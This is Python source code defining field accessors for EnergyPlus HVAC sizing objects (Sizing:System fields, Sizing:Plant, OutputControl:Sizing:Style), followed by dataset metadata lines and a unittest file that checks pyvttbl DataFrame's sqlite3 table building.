def central_cooling_design_supply_air_temperature(self, value=None):
"""Corresponds to IDD field `Central Cooling Design Supply Air
Temperature`"""
self["Central Cooling Design Supply Air Temperature"] = value
@property
def central_heating_design_supply_air_temperature(self):
"""field `Central Heating Design Supply Air Temperature`
| Units: C
Args:
value (float): value for IDD Field `Central Heating Design Supply Air Temperature`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `central_heating_design_supply_air_temperature` or None if not set
"""
return self["Central Heating Design Supply Air Temperature"]
@central_heating_design_supply_air_temperature.setter
def central_heating_design_supply_air_temperature(self, value=None):
"""Corresponds to IDD field `Central Heating Design Supply Air
Temperature`"""
self["Central Heating Design Supply Air Temperature"] = value
@property
def type_of_zone_sum_to_use(self):
"""field `Type of Zone Sum to Use`
| Default value: NonCoincident
Args:
value (str): value for IDD Field `Type of Zone Sum to Use`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `type_of_zone_sum_to_use` or None if not set
"""
return self["Type of Zone Sum to Use"]
@type_of_zone_sum_to_use.setter
def type_of_zone_sum_to_use(self, value="NonCoincident"):
"""Corresponds to IDD field `Type of Zone Sum to Use`"""
self["Type of Zone Sum to Use"] = value
@property
def a_100_outdoor_air_in_cooling(self):
"""field `100% Outdoor Air in Cooling`
| Default value: No
Args:
value (str): value for IDD Field `100% Outdoor Air in Cooling`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `a_100_outdoor_air_in_cooling` or None if not set
"""
return self["100% Outdoor Air in Cooling"]
@a_100_outdoor_air_in_cooling.setter
def a_100_outdoor_air_in_cooling(self, value="No"):
"""Corresponds to IDD field `100% Outdoor Air in Cooling`"""
self["100% Outdoor Air in Cooling"] = value
@property
def a_100_outdoor_air_in_heating(self):
"""field `100% Outdoor Air in Heating`
| Default value: No
Args:
value (str): value for IDD Field `100% Outdoor Air in Heating`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `a_100_outdoor_air_in_heating` or None if not set
"""
return self["100% Outdoor Air in Heating"]
@a_100_outdoor_air_in_heating.setter
def a_100_outdoor_air_in_heating(self, value="No"):
"""Corresponds to IDD field `100% Outdoor Air in Heating`"""
self["100% Outdoor Air in Heating"] = value
@property
def central_cooling_design_supply_air_humidity_ratio(self):
"""field `Central Cooling Design Supply Air Humidity Ratio`
| Units: kgWater/kgDryAir
| Default value: 0.008
Args:
value (float): value for IDD Field `Central Cooling Design Supply Air Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `central_cooling_design_supply_air_humidity_ratio` or None if not set
"""
return self["Central Cooling Design Supply Air Humidity Ratio"]
@central_cooling_design_supply_air_humidity_ratio.setter
def central_cooling_design_supply_air_humidity_ratio(self, value=0.008):
"""Corresponds to IDD field `Central Cooling Design Supply Air Humidity
Ratio`"""
self["Central Cooling Design Supply Air Humidity Ratio"] = value
@property
def central_heating_design_supply_air_humidity_ratio(self):
"""field `Central Heating Design Supply Air Humidity Ratio`
| Units: kgWater/kgDryAir
| Default value: 0.008
Args:
value (float): value for IDD Field `Central Heating Design Supply Air Humidity Ratio`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `central_heating_design_supply_air_humidity_ratio` or None if not set
"""
return self["Central Heating Design Supply Air Humidity Ratio"]
@central_heating_design_supply_air_humidity_ratio.setter
def central_heating_design_supply_air_humidity_ratio(self, value=0.008):
"""Corresponds to IDD field `Central Heating Design Supply Air Humidity
Ratio`"""
self["Central Heating Design Supply Air Humidity Ratio"] = value
@property
def cooling_supply_air_flow_rate_method(self):
"""field `Cooling Supply Air Flow Rate Method`
| Default value: DesignDay
Args:
value (str): value for IDD Field `Cooling Supply Air Flow Rate Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_supply_air_flow_rate_method` or None if not set
"""
return self["Cooling Supply Air Flow Rate Method"]
@cooling_supply_air_flow_rate_method.setter
def cooling_supply_air_flow_rate_method(self, value="DesignDay"):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate Method`"""
self["Cooling Supply Air Flow Rate Method"] = value
@property
def cooling_supply_air_flow_rate(self):
"""field `Cooling Supply Air Flow Rate`
| This input is used if Cooling Supply Air Flow Rate Method is Flow/System
| This value will *not* be multiplied by any sizing factor or by zone multipliers.
| If using zone multipliers, this value must be large enough to serve the multiplied zones.
| Units: m3/s
Args:
value (float): value for IDD Field `Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_supply_air_flow_rate` or None if not set
"""
return self["Cooling Supply Air Flow Rate"]
@cooling_supply_air_flow_rate.setter
def cooling_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate`"""
self["Cooling Supply Air Flow Rate"] = value
@property
def cooling_supply_air_flow_rate_per_floor_area(self):
"""field `Cooling Supply Air Flow Rate Per Floor Area`
| Enter the cooling supply air volume flow rate per total conditioned floor area.
| Required field when Cooling Supply Air Flow Rate Method is FlowPerFloorArea.
| Units: m3/s-m2
Args:
value (float): value for IDD Field `Cooling Supply Air Flow Rate Per Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_supply_air_flow_rate_per_floor_area` or None if not set
"""
return self["Cooling Supply Air Flow Rate Per Floor Area"]
@cooling_supply_air_flow_rate_per_floor_area.setter
def cooling_supply_air_flow_rate_per_floor_area(self, value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate Per Floor
Area`"""
self["Cooling Supply Air Flow Rate Per Floor Area"] = value
@property
def cooling_fraction_of_autosized_cooling_supply_air_flow_rate(self):
"""field `Cooling Fraction of Autosized Cooling Supply Air Flow Rate`
| Enter the supply air volume flow rate as a fraction of the cooling supply air flow rate.
| Required field when Cooling Supply Air Flow Rate Method is
| FractionOfAutosizedCoolingAirflow.
Args:
value (float): value for IDD Field `Cooling Fraction of Autosized Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_fraction_of_autosized_cooling_supply_air_flow_rate` or None if not set
"""
return self[
"Cooling Fraction of Autosized Cooling Supply Air Flow Rate"]
@cooling_fraction_of_autosized_cooling_supply_air_flow_rate.setter
def cooling_fraction_of_autosized_cooling_supply_air_flow_rate(
self,
value=None):
"""Corresponds to IDD field `Cooling Fraction of Autosized Cooling
Supply Air Flow Rate`"""
self[
"Cooling Fraction of Autosized Cooling Supply Air Flow Rate"] = value
@property
def cooling_supply_air_flow_rate_per_unit_cooling_capacity(self):
"""field `Cooling Supply Air Flow Rate Per Unit Cooling Capacity`
| Enter the supply air volume flow rate per unit cooling capacity.
| Required field when Cooling Supply Air Flow Rate Method is
| FlowPerCoolingCapacity.
| Units: m3/s-W
Args:
value (float): value for IDD Field `Cooling Supply Air Flow Rate Per Unit Cooling Capacity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_supply_air_flow_rate_per_unit_cooling_capacity` or None if not set
"""
return self["Cooling Supply Air Flow Rate Per Unit Cooling Capacity"]
@cooling_supply_air_flow_rate_per_unit_cooling_capacity.setter
def cooling_supply_air_flow_rate_per_unit_cooling_capacity(
self,
value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate Per Unit
Cooling Capacity`"""
self["Cooling Supply Air Flow Rate Per Unit Cooling Capacity"] = value
@property
def heating_supply_air_flow_rate_method(self):
"""field `Heating Supply Air Flow Rate Method`
| Default value: DesignDay
Args:
value (str): value for IDD Field `Heating Supply Air Flow Rate Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_supply_air_flow_rate_method` or None if not set
"""
return self["Heating Supply Air Flow Rate Method"]
@heating_supply_air_flow_rate_method.setter
def heating_supply_air_flow_rate_method(self, value="DesignDay"):
"""Corresponds to IDD field `Heating Supply Air Flow Rate Method`"""
self["Heating Supply Air Flow Rate Method"] = value
@property
def heating_supply_air_flow_rate(self):
"""field `Heating Supply Air Flow Rate`
| Required field when Heating Supply Air Flow Rate Method is Flow/System
| This value will *not* be multiplied by any sizing factor or by zone multipliers.
| If using zone multipliers, this value must be large enough to serve the multiplied zones.
| Units: m3/s
Args:
value (float): value for IDD Field `Heating Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_supply_air_flow_rate` or None if not set
"""
return self["Heating Supply Air Flow Rate"]
@heating_supply_air_flow_rate.setter
def heating_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Supply Air Flow Rate`"""
self["Heating Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate_per_floor_area(self):
"""field `Heating Supply Air Flow Rate Per Floor Area`
| Enter the heating supply air volume flow rate per total conditioned floor area.
| Required field when Heating Supply Air Flow Rate Method is FlowPerFloorArea.
| Units: m3/s-m2
Args:
value (float): value for IDD Field `Heating Supply Air Flow Rate Per Floor Area`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_supply_air_flow_rate_per_floor_area` or None if not set
"""
return self["Heating Supply Air Flow Rate Per Floor Area"]
@heating_supply_air_flow_rate_per_floor_area.setter
def heating_supply_air_flow_rate_per_floor_area(self, value=None):
"""Corresponds to IDD field `Heating Supply Air Flow Rate Per Floor
Area`"""
self["Heating Supply Air Flow Rate Per Floor Area"] = value
@property
def heating_fraction_of_autosized_heating_supply_air_flow_rate(self):
    """Get IDD field `Heating Fraction of Autosized Heating Supply Air Flow Rate`.

    Supply air volume flow rate as a fraction of the heating supply air
    flow rate.  Required when the Heating Supply Air Flow Rate Method is
    FractionOfAutosizedHeatingAirflow.

    Returns:
        float: the stored value, or None if not set.
    """
    key = "Heating Fraction of Autosized Heating Supply Air Flow Rate"
    return self[key]

@heating_fraction_of_autosized_heating_supply_air_flow_rate.setter
def heating_fraction_of_autosized_heating_supply_air_flow_rate(self, value=None):
    """Set IDD field `Heating Fraction of Autosized Heating Supply Air Flow Rate`.

    Args:
        value (float): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Heating Fraction of Autosized Heating Supply Air Flow Rate"
    self[key] = value
@property
def heating_fraction_of_autosized_cooling_supply_air_flow_rate(self):
    """Get IDD field `Heating Fraction of Autosized Cooling Supply Air Flow Rate`.

    Supply air volume flow rate as a fraction of the cooling supply air
    flow rate.  Required when the Heating Supply Air Flow Rate Method is
    FractionOfAutosizedCoolingAirflow.

    Returns:
        float: the stored value, or None if not set.
    """
    key = "Heating Fraction of Autosized Cooling Supply Air Flow Rate"
    return self[key]

@heating_fraction_of_autosized_cooling_supply_air_flow_rate.setter
def heating_fraction_of_autosized_cooling_supply_air_flow_rate(self, value=None):
    """Set IDD field `Heating Fraction of Autosized Cooling Supply Air Flow Rate`.

    Args:
        value (float): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Heating Fraction of Autosized Cooling Supply Air Flow Rate"
    self[key] = value
@property
def heating_supply_air_flow_rate_per_unit_heating_capacity(self):
    """Get IDD field `Heating Supply Air Flow Rate Per Unit Heating Capacity`.

    Heating supply air volume flow rate per unit heating capacity
    (m3/s-W).  Required when the Heating Supply Air Flow Rate Method is
    FlowPerHeatingCapacity.

    Returns:
        float: the stored value, or None if not set.
    """
    key = "Heating Supply Air Flow Rate Per Unit Heating Capacity"
    return self[key]

@heating_supply_air_flow_rate_per_unit_heating_capacity.setter
def heating_supply_air_flow_rate_per_unit_heating_capacity(self, value=None):
    """Set IDD field `Heating Supply Air Flow Rate Per Unit Heating Capacity`.

    Args:
        value (float): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Heating Supply Air Flow Rate Per Unit Heating Capacity"
    self[key] = value
@property
def system_outdoor_air_method(self):
    """Get IDD field `System Outdoor Air Method`.

    Default value: ZoneSum.

    Returns:
        str: the stored value, or None if not set.
    """
    key = "System Outdoor Air Method"
    return self[key]

@system_outdoor_air_method.setter
def system_outdoor_air_method(self, value="ZoneSum"):
    """Set IDD field `System Outdoor Air Method`.

    Args:
        value (str): new value for the field (defaults to "ZoneSum").

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "System Outdoor Air Method"
    self[key] = value
@property
def zone_maximum_outdoor_air_fraction(self):
    """Get IDD field `Zone Maximum Outdoor Air Fraction`.

    Units: dimensionless.  Default value: 1.0.

    Returns:
        float: the stored value, or None if not set.
    """
    key = "Zone Maximum Outdoor Air Fraction"
    return self[key]

@zone_maximum_outdoor_air_fraction.setter
def zone_maximum_outdoor_air_fraction(self, value=1.0):
    """Set IDD field `Zone Maximum Outdoor Air Fraction`.

    Args:
        value (float): new value for the field (defaults to 1.0).

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Zone Maximum Outdoor Air Fraction"
    self[key] = value
@property
def cooling_design_capacity_method(self):
    """Get IDD field `Cooling Design Capacity Method`.

    Selects how the system cooling design capacity is determined for
    scalable sizing: CoolingDesignCapacity (specified or auto-sized
    value), CapacityPerFloorArea (capacity per floor area times total
    cooled floor area), FractionOfAutosizedCoolingCapacity (fraction of
    the auto-sized capacity), or None/blank (capacity set to zero, e.g.
    when the airloop has no cooling coil).  Default value:
    CoolingDesignCapacity.

    Returns:
        str: the stored value, or None if not set.
    """
    key = "Cooling Design Capacity Method"
    return self[key]

@cooling_design_capacity_method.setter
def cooling_design_capacity_method(self, value="CoolingDesignCapacity"):
    """Set IDD field `Cooling Design Capacity Method`.

    Args:
        value (str): new value (defaults to "CoolingDesignCapacity").

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Cooling Design Capacity Method"
    self[key] = value
@property
def cooling_design_capacity(self):
    """Get IDD field `Cooling Design Capacity`.

    Design cooling capacity in W.  Default value: "autosize".

    Returns:
        float or "Autosize": the stored value, or None if not set.
    """
    key = "Cooling Design Capacity"
    return self[key]

@cooling_design_capacity.setter
def cooling_design_capacity(self, value="autosize"):
    """Set IDD field `Cooling Design Capacity`.

    Args:
        value (float or "Autosize"): new value (defaults to "autosize").

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Cooling Design Capacity"
    self[key] = value
@property
def cooling_design_capacity_per_floor_area(self):
    """Get IDD field `Cooling Design Capacity Per Floor Area`.

    Cooling design capacity per total floor area of cooled zones served
    by an airloop (W/m2).  Required when the cooling design capacity
    method is CapacityPerFloorArea.

    Returns:
        float: the stored value, or None if not set.
    """
    key = "Cooling Design Capacity Per Floor Area"
    return self[key]

@cooling_design_capacity_per_floor_area.setter
def cooling_design_capacity_per_floor_area(self, value=None):
    """Set IDD field `Cooling Design Capacity Per Floor Area`.

    Args:
        value (float): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Cooling Design Capacity Per Floor Area"
    self[key] = value
@property
def fraction_of_autosized_cooling_design_capacity(self):
    """Get IDD field `Fraction of Autosized Cooling Design Capacity`.

    Fraction of the auto-sized cooling design capacity.  Required when
    the cooling design capacity method is
    FractionOfAutosizedCoolingCapacity.

    Returns:
        float: the stored value, or None if not set.
    """
    key = "Fraction of Autosized Cooling Design Capacity"
    return self[key]

@fraction_of_autosized_cooling_design_capacity.setter
def fraction_of_autosized_cooling_design_capacity(self, value=None):
    """Set IDD field `Fraction of Autosized Cooling Design Capacity`.

    Args:
        value (float): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Fraction of Autosized Cooling Design Capacity"
    self[key] = value
@property
def heating_design_capacity_method(self):
    """Get IDD field `Heating Design Capacity Method`.

    Selects how the heating design capacity is determined for scalable
    sizing: HeatingDesignCapacity (specified or auto-sized value),
    CapacityPerFloorArea (capacity per floor area times total heated
    floor area), FractionOfAutosizedHeatingCapacity (fraction of the
    auto-sized capacity), or None/blank (capacity set to zero, e.g.
    when the airloop has no heating coil).  Default value:
    HeatingDesignCapacity.

    Returns:
        str: the stored value, or None if not set.
    """
    key = "Heating Design Capacity Method"
    return self[key]

@heating_design_capacity_method.setter
def heating_design_capacity_method(self, value="HeatingDesignCapacity"):
    """Set IDD field `Heating Design Capacity Method`.

    Args:
        value (str): new value (defaults to "HeatingDesignCapacity").

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Heating Design Capacity Method"
    self[key] = value
@property
def heating_design_capacity(self):
    """Get IDD field `Heating Design Capacity`.

    Design heating capacity in W.  Default value: "autosize".

    Returns:
        float or "Autosize": the stored value, or None if not set.
    """
    key = "Heating Design Capacity"
    return self[key]

@heating_design_capacity.setter
def heating_design_capacity(self, value="autosize"):
    """Set IDD field `Heating Design Capacity`.

    Args:
        value (float or "Autosize"): new value (defaults to "autosize").

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Heating Design Capacity"
    self[key] = value
@property
def heating_design_capacity_per_floor_area(self):
    """Get IDD field `Heating Design Capacity Per Floor Area`.

    Heating design capacity per zone floor area (W/m2).  Required when
    the heating design capacity method is CapacityPerFloorArea.

    Returns:
        float: the stored value, or None if not set.
    """
    key = "Heating Design Capacity Per Floor Area"
    return self[key]

@heating_design_capacity_per_floor_area.setter
def heating_design_capacity_per_floor_area(self, value=None):
    """Set IDD field `Heating Design Capacity Per Floor Area`.

    Args:
        value (float): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Heating Design Capacity Per Floor Area"
    self[key] = value
@property
def fraction_of_autosized_heating_design_capacity(self):
    """Get IDD field `Fraction of Autosized Heating Design Capacity`.

    Fraction of the auto-sized heating design capacity.  Required when
    the heating design capacity method is
    FractionOfAutosizedHeatingCapacity.

    Returns:
        float: the stored value, or None if not set.
    """
    key = "Fraction of Autosized Heating Design Capacity"
    return self[key]

@fraction_of_autosized_heating_design_capacity.setter
def fraction_of_autosized_heating_design_capacity(self, value=None):
    """Set IDD field `Fraction of Autosized Heating Design Capacity`.

    Args:
        value (float): new value for the field.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Fraction of Autosized Heating Design Capacity"
    self[key] = value
@property
def central_cooling_capacity_control_method(self):
    """Get IDD field `Central Cooling Capacity Control Method`.

    Method used to control the coil's output.  Default value: OnOff.

    Returns:
        str: the stored value, or None if not set.
    """
    key = "Central Cooling Capacity Control Method"
    return self[key]

@central_cooling_capacity_control_method.setter
def central_cooling_capacity_control_method(self, value="OnOff"):
    """Set IDD field `Central Cooling Capacity Control Method`.

    Args:
        value (str): new value for the field (defaults to "OnOff").

    Raises:
        ValueError: if `value` is not a valid value.
    """
    key = "Central Cooling Capacity Control Method"
    self[key] = value
class SizingPlant(DataObject):
    """Corresponds to IDD object `Sizing:Plant`.

    Holds the input needed to autosize plant loop flow rates and
    equipment capacities.  Components that use water for heating or
    cooling (e.g. hot or chilled water coils) use this information to
    compute their maximum water flow rates, which are then summed to
    size the Plant Loop flow rates.
    """

    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            ('plant or condenser loop name',
             {'name': 'Plant or Condenser Loop Name',
              'pyname': 'plant_or_condenser_loop_name',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'object-list'}),
            ('loop type',
             {'name': 'Loop Type',
              'pyname': 'loop_type',
              'required-field': True,
              'autosizable': False,
              'accepted-values': ['Heating', 'Cooling', 'Condenser', 'Steam'],
              'autocalculatable': False,
              'type': 'alpha'}),
            ('design loop exit temperature',
             {'name': 'Design Loop Exit Temperature',
              'pyname': 'design_loop_exit_temperature',
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'real',
              'unit': 'C'}),
            ('loop design temperature difference',
             {'name': 'Loop Design Temperature Difference',
              'pyname': 'loop_design_temperature_difference',
              'minimum>': 0.0,
              'required-field': True,
              'autosizable': False,
              'autocalculatable': False,
              'type': 'real',
              'unit': 'deltaC'}),
            ('sizing option',
             {'name': 'Sizing Option',
              'pyname': 'sizing_option',
              'default': 'NonCoincident',
              'required-field': False,
              'autosizable': False,
              'accepted-values': ['Coincident', 'NonCoincident'],
              'autocalculatable': False,
              'type': 'alpha'}),
            ('zone timesteps in averaging window',
             {'name': 'Zone Timesteps in Averaging Window',
              'pyname': 'zone_timesteps_in_averaging_window',
              'default': 1,
              'required-field': False,
              'autosizable': False,
              'minimum': 1,
              'autocalculatable': False,
              'type': 'integer'}),
            ('coincident sizing factor mode',
             {'name': 'Coincident Sizing Factor Mode',
              'pyname': 'coincident_sizing_factor_mode',
              'required-field': False,
              'autosizable': False,
              'accepted-values': ['None',
                                  'GlobalHeatingSizingFactor',
                                  'GlobalCoolingSizingFactor',
                                  'LoopComponentSizingFactor'],
              'autocalculatable': False,
              'type': 'alpha'})]),
        'format': None,
        'group': 'HVAC Design Objects',
        'min-fields': 4,
        'name': 'Sizing:Plant',
        'pyname': 'SizingPlant',
        'required-object': False,
        'unique-object': False}

    @property
    def plant_or_condenser_loop_name(self):
        """Get IDD field `Plant or Condenser Loop Name`.

        Name of a PlantLoop or a CondenserLoop object.

        Returns:
            str: the stored value, or None if not set.
        """
        key = "Plant or Condenser Loop Name"
        return self[key]

    @plant_or_condenser_loop_name.setter
    def plant_or_condenser_loop_name(self, value=None):
        """Set IDD field `Plant or Condenser Loop Name`.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        key = "Plant or Condenser Loop Name"
        self[key] = value

    @property
    def loop_type(self):
        """Get IDD field `Loop Type`.

        Returns:
            str: the stored value, or None if not set.
        """
        key = "Loop Type"
        return self[key]

    @loop_type.setter
    def loop_type(self, value=None):
        """Set IDD field `Loop Type`.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        key = "Loop Type"
        self[key] = value

    @property
    def design_loop_exit_temperature(self):
        """Get IDD field `Design Loop Exit Temperature` (C).

        Returns:
            float: the stored value, or None if not set.
        """
        key = "Design Loop Exit Temperature"
        return self[key]

    @design_loop_exit_temperature.setter
    def design_loop_exit_temperature(self, value=None):
        """Set IDD field `Design Loop Exit Temperature` (C).

        Raises:
            ValueError: if `value` is not a valid value.
        """
        key = "Design Loop Exit Temperature"
        self[key] = value

    @property
    def loop_design_temperature_difference(self):
        """Get IDD field `Loop Design Temperature Difference` (deltaC).

        Returns:
            float: the stored value, or None if not set.
        """
        key = "Loop Design Temperature Difference"
        return self[key]

    @loop_design_temperature_difference.setter
    def loop_design_temperature_difference(self, value=None):
        """Set IDD field `Loop Design Temperature Difference` (deltaC).

        Raises:
            ValueError: if `value` is not a valid value.
        """
        key = "Loop Design Temperature Difference"
        self[key] = value

    @property
    def sizing_option(self):
        """Get IDD field `Sizing Option`.

        If Coincident is chosen, sizing is based on HVAC Sizing
        Simulations and the SimulationControl field `Do HVAC Sizing
        Simulation for Sizing Periods` must be set to Yes.  Default
        value: NonCoincident.

        Returns:
            str: the stored value, or None if not set.
        """
        key = "Sizing Option"
        return self[key]

    @sizing_option.setter
    def sizing_option(self, value="NonCoincident"):
        """Set IDD field `Sizing Option` (defaults to "NonCoincident").

        Raises:
            ValueError: if `value` is not a valid value.
        """
        key = "Sizing Option"
        self[key] = value

    @property
    def zone_timesteps_in_averaging_window(self):
        """Get IDD field `Zone Timesteps in Averaging Window`.

        Used by the coincident sizing algorithm to apply a running
        average to peak flow rates seen during HVAC Sizing Simulations.
        Default value: 1; value >= 1.

        Returns:
            int: the stored value, or None if not set.
        """
        key = "Zone Timesteps in Averaging Window"
        return self[key]

    @zone_timesteps_in_averaging_window.setter
    def zone_timesteps_in_averaging_window(self, value=1):
        """Set IDD field `Zone Timesteps in Averaging Window` (defaults to 1).

        Raises:
            ValueError: if `value` is not a valid value.
        """
        key = "Zone Timesteps in Averaging Window"
        self[key] = value

    @property
    def coincident_sizing_factor_mode(self):
        """Get IDD field `Coincident Sizing Factor Mode`.

        Adjusts the coincident sizing result by applying a sizing
        factor.

        Returns:
            str: the stored value, or None if not set.
        """
        key = "Coincident Sizing Factor Mode"
        return self[key]

    @coincident_sizing_factor_mode.setter
    def coincident_sizing_factor_mode(self, value=None):
        """Set IDD field `Coincident Sizing Factor Mode`.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        key = "Coincident Sizing Factor Mode"
        self[key] = value
class OutputControlSizingStyle(DataObject):
    """Corresponds to IDD object `OutputControl:Sizing:Style`.

    Selects the column separator for the Sizing output files.  The
    default, comma, imports cleanly into spreadsheet programs such as
    Excel(tm); tab may suit word processors better; Fixed separates
    the "columns" with spaces.
    """

    _schema = {
        'extensible-fields': OrderedDict(),
        'fields': OrderedDict([
            ('column separator',
             {'name': 'Column Separator',
              'pyname': 'column_separator',
              'required-field': True,
              'autosizable': False,
              'accepted-values': ['Comma', 'Tab', 'Fixed'],
              'autocalculatable': False,
              'type': 'alpha'})]),
        'format': None,
        'group': 'HVAC Design Objects',
        'min-fields': 0,
        'name': 'OutputControl:Sizing:Style',
        'pyname': 'OutputControlSizingStyle',
        'required-object': False,
        'unique-object': True}

    @property
    def column_separator(self):
        """Get IDD field `Column Separator`.

        Returns:
            str: the stored value, or None if not set.
        """
        key = "Column Separator"
        return self[key]

    @column_separator.setter
    def column_separator(self, value=None):
        """Set IDD field `Column Separator`.

        Raises:
            ValueError: if `value` is not a valid value.
        """
        key = "Column Separator"
        self[key] = value
| 45.427794
| 125
| 0.520864
| 18,211
| 183,710
| 5.112569
| 0.021635
| 0.04278
| 0.046786
| 0.062993
| 0.931121
| 0.897632
| 0.84496
| 0.799109
| 0.732635
| 0.676516
| 0
| 0.004421
| 0.410201
| 183,710
| 4,043
| 126
| 45.43903
| 0.854862
| 0.322753
| 0
| 0.620406
| 0
| 0
| 0.275822
| 0.043666
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121777
| false
| 0.000549
| 0.001646
| 0
| 0.193088
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c51f7cc15e77423296f866aafcaedc5fc5aa7c83
| 6,957
|
py
|
Python
|
pyvttbl/tests/test_df_build_sqlite3_tbl.py
|
yk/pyvttbl
|
af66c1aba410ba5386249cd5b95f2ae0ed01d870
|
[
"BSD-3-Clause"
] | null | null | null |
pyvttbl/tests/test_df_build_sqlite3_tbl.py
|
yk/pyvttbl
|
af66c1aba410ba5386249cd5b95f2ae0ed01d870
|
[
"BSD-3-Clause"
] | null | null | null |
pyvttbl/tests/test_df_build_sqlite3_tbl.py
|
yk/pyvttbl
|
af66c1aba410ba5386249cd5b95f2ae0ed01d870
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2011, Roger Lew [see LICENSE.txt]
# This software is funded in part by NIH Grant P20 RR016454.
# Python 2 to 3 workarounds
import sys
# Map interpreter-specific builtins onto private aliases so the rest of
# the module can use `_strobj` / `_xrange` on either Python major version.
if sys.version_info[0] == 2:
    _strobj = str  # NOTE(review): py2 branch aliases str, not unicode/basestring — presumably intentional
    _xrange = xrange
elif sys.version_info[0] == 3:
    _strobj = str
    _xrange = range  # py3 range is lazy, like the old xrange
import unittest
import warnings
import os
from random import shuffle
import numpy as np
from pyvttbl import DataFrame
from pyvttbl.misc.support import *
class Test__build_sqlite3_tbl(unittest.TestCase):
    """Tests for DataFrame._build_sqlite3_tbl.

    Each test fills a DataFrame with 100-row columns (ints, strings,
    floats, plus a mixed str/int column), builds the sqlite3 table,
    runs `select * from TBL`, and compares the cursor rows against the
    DataFrame columns.  Mixed columns come back as text, hence the
    str() on the expected side.
    """

    def test00(self):
        """test with string keys"""
        df=DataFrame()
        ## df.PRINTQUERIES=True
        df['1']=list(range(100))
        df['2']=['bob' for i in range(100)]
        df['3']=[i*1.234232 for i in range(100)]
        df['4']=['bob' for i in range(50)]+list(range(50))
        df['5']= np.sqrt(df['3'] *100.)
        ## print(df)
        shuffle(df['1'])
        shuffle(df['2'])
        shuffle(df['3'])
        df._build_sqlite3_tbl(list(df.keys()))
        df._execute('select * from TBL')
        # column '5' (e) is fetched but deliberately not asserted here
        for i,(a,b,c,d,e) in enumerate(df.cur):
            self.assertEqual(a,df['1'][i])
            self.assertEqual(b,df['2'][i])
            self.assertEqual(c,df['3'][i])
            self.assertEqual(d,str(df['4'][i]))

    def test01(self):
        """test with integer keys"""
        df=DataFrame()
        df[1]=list(range(100))
        df[2]=['bob' for i in range(100)]
        df[3]=[i*1.234232 for i in range(100)]
        df[4]=['bob' for i in range(50)]+list(range(50))
        shuffle(df[1])
        shuffle(df[2])
        shuffle(df[3])
        shuffle(df[4])
        df._build_sqlite3_tbl(list(df.keys()))
        df._execute('select * from TBL')
        for i,(a,b,c,d) in enumerate(df.cur):
            self.assertEqual(a,df[1][i])
            self.assertEqual(b,df[2][i])
            self.assertEqual(c,df[3][i])
            self.assertEqual(d,str(df[4][i]))

    def test02(self):
        """test with tuple keys"""
        df=DataFrame()
        ## df.PRINTQUERIES = True
        df[(1,)]=list(range(100))
        df[(2,)]=['bob' for i in range(100)]
        df[(3,)]=[i*1.234232 for i in range(100)]
        df[(4,)]=['bob' for i in range(50)]+list(range(50))
        shuffle(df[(1,)])
        shuffle(df[(2,)])
        shuffle(df[(3,)])
        shuffle(df[(4,)])
        df._build_sqlite3_tbl(list(df.keys()))
        df._execute('select * from TBL')
        for i,(a,b,c,d) in enumerate(df.cur):
            self.assertEqual(a,df[(1,)][i])
            self.assertEqual(b,df[(2,)][i])
            self.assertEqual(c,df[(3,)][i])
            self.assertEqual(d,str(df[(4,)][i]))

    def test1(self):
        """test with integer keys subset of table"""
        # only the first two columns are written to the table
        df=DataFrame()
        df[1]=list(range(100))
        df[2]=['bob' for i in range(100)]
        df[3]=[i*1.234232 for i in range(100)]
        df[4]=['bob' for i in range(50)]+list(range(50))
        shuffle(df[1])
        shuffle(df[2])
        shuffle(df[3])
        shuffle(df[4])
